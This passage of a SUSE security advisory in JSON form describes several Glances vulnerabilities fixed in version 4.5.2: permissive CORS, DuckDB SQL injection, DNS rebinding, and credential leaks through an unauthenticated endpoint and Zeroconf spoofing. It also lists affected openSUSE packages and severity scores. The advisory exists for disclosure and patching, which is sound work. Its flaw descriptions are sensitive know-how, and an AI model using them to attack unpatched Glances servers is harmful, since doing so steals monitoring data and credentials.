"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32609"
},
{
"cve": "CVE-2026-32610",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32610"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32610",
"url": "https://www.suse.com/security/cve/CVE-2026-32610"
},
{
"category": "external",
"summary": "SUSE Bug 1259841 for CVE-2026-32610",
"url": "https://bugzilla.suse.com/1259841"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32610"
},
{
"cve": "CVE-2026-32611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-x46r fix (commit 39161f0) addressed SQL injection in the TimescaleDB export module by converting all SQL operations to use parameterized queries and `psycopg.sql` composable objects. However, the DuckDB export module (`glances/exports/glances_duckdb/__init__.py`) was not included in this fix and contains the same class of vulnerability: table names and column names derived from monitoring statistics are directly interpolated into SQL statements via f-strings. While DuckDB INSERT values already use parameterized queries (`?` placeholders), the DDL construction and table name references do not escape or parameterize identifier names. Version 4.5.3 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32611",
"url": "https://www.suse.com/security/cve/CVE-2026-32611"
},
{
"category": "external",
"summary": "SUSE Bug 1259840 for CVE-2026-32611",
"url": "https://bugzilla.suse.com/1259840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32611"
},
{
"cve": "CVE-2026-32632",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32632"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32632",
"url": "https://www.suse.com/security/cve/CVE-2026-32632"
},
{
"category": "external",
"summary": "SUSE Bug 1259839 for CVE-2026-32632",
"url": "https://bugzilla.suse.com/1259839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-32632"
},
{
"cve": "CVE-2026-32633",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32633"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32633",
"url": "https://www.suse.com/security/cve/CVE-2026-32633"
},
{
"category": "external",
"summary": "SUSE Bug 1259838 for CVE-2026-32633",
"url": "https://bugzilla.suse.com/1259838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32633"
},
{
"cve": "CVE-2026-32634",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32634"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, Glances stores both the Zeroconf-advertised server name and the discovered IP address for dynamic servers, but later builds connection URIs from the untrusted advertised name instead of the discovered IP. When a dynamic server reports itself as protected, Glances also uses that same untrusted name as the lookup key for saved passwords and the global `[passwords] default` credential. An attacker on the same local network can advertise a fake Glances service over Zeroconf and cause the browser to automatically send a reusable Glances authentication secret to an attacker-controlled host. This affects the background polling path and the REST/WebUI click-through path in Central Browser mode. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32634",
"url": "https://www.suse.com/security/cve/CVE-2026-32634"
},
{
"category": "external",
"summary": "SUSE Bug 1259837 for CVE-2026-32634",
"url": "https://bugzilla.suse.com/1259837"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32634"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…